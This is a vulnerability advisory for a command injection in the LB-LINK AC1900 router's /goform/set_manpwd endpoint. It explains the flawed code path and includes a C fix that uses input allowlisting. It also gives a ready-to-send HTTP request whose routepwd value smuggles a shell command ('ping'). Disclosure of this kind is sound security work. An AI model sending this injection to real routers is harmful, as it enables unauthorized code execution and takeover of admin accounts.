Affected Version

Vendor: LBLINK
Product: AC1900
Firmware Version: V1.0.2

Firmware Download Link

https://www.b-link.net.cn/downloads_16.html

Vulnerability Description

In the LB-LINK AC1900 router running firmware version V1.0.2, the route /goform/set_manpwd contains a command injection vulnerability, which may lead to remote arbitrary code execution.

Vulnerability Detail

In the backend processing function sub_45EBF0 of the route /goform/set_manpwd, the parameter routepwd is retrieved from the HTTP message through the function websGetVar. After this parameter is serialized in JSON format, the library function bs_SetManPwd is used to modify the NVRAM variable Password. Subsequently, the modified Password is obtained through the function nvram_bufget, and a string is concatenated using sprintf and then passed into bl_do_system for command execution. An attacker can construct the routepwd parameter to achieve remote code execution.

At the same time, attackers can freely modify the administrator password through this interface.
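
One way to close the injection path described above, shown as an added example (not code from the vendor firmware or from the original advisory): validate routepwd against an allowlist before it is written to NVRAM, and bound the command buffer. The length limits, the allowed punctuation set and the command name `set_admin_pwd` are assumptions; the real format string passed to bl_do_system is not shown on the page.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy limits; the firmware's real password rules are not on the page. */
#define PWD_MIN 8
#define PWD_MAX 32

/* Allowlist: letters, digits and "_.@" only. None of these is special to
 * /bin/sh, so ';', '|', '&', '$', '`', quotes, spaces and newlines all fail. */
int routepwd_is_safe(const char *pwd)
{
    size_t n, i;
    if (pwd == NULL)
        return 0;
    n = strlen(pwd);
    if (n < PWD_MIN || n > PWD_MAX)
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)pwd[i];
        if (!isalnum(c) && strchr("_.@", c) == NULL)
            return 0;
    }
    return 1;
}

/* Call this before the value reaches NVRAM, so the string later read back
 * is already clean. "set_admin_pwd" is a placeholder command name.
 * Returns 0 on success, -1 if the value is rejected or would be truncated. */
int build_pwd_cmd(char *out, size_t outlen, const char *pwd)
{
    int n;
    if (!routepwd_is_safe(pwd))
        return -1;
    n = snprintf(out, outlen, "set_admin_pwd '%s'", pwd);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    char cmd[64];
    /* First value is a benign sample; second is the routepwd value from the PoC. */
    const char *samples[] = { "qwer1234", "qwer1234;ping -c 1 192.168.16.100" };
    for (int i = 0; i < 2; i++)
        printf("%-40s -> %s\n", samples[i],
               build_pwd_cmd(cmd, sizeof cmd, samples[i]) == 0 ? cmd : "rejected");
    return 0;
}
```

Passing the password as a separate argv element to an exec-family call, with no shell in between, removes the need for quoting altogether; the allowlist is the smaller change when the existing call has to stay.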

PoC

POST /goform/set_manpwd HTTP/1.1
Host: 192.168.16.1
Content-Length: 42
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Origin: http://192.168.16.1
Referer: http://192.168.16.1/admin/more.html
Accept-Encoding: gzip, deflate, br
Cookie: platform=0; user=admin
Connection: keep-alive

routepwd=qwer1234;ping -c 1 192.168.16.100
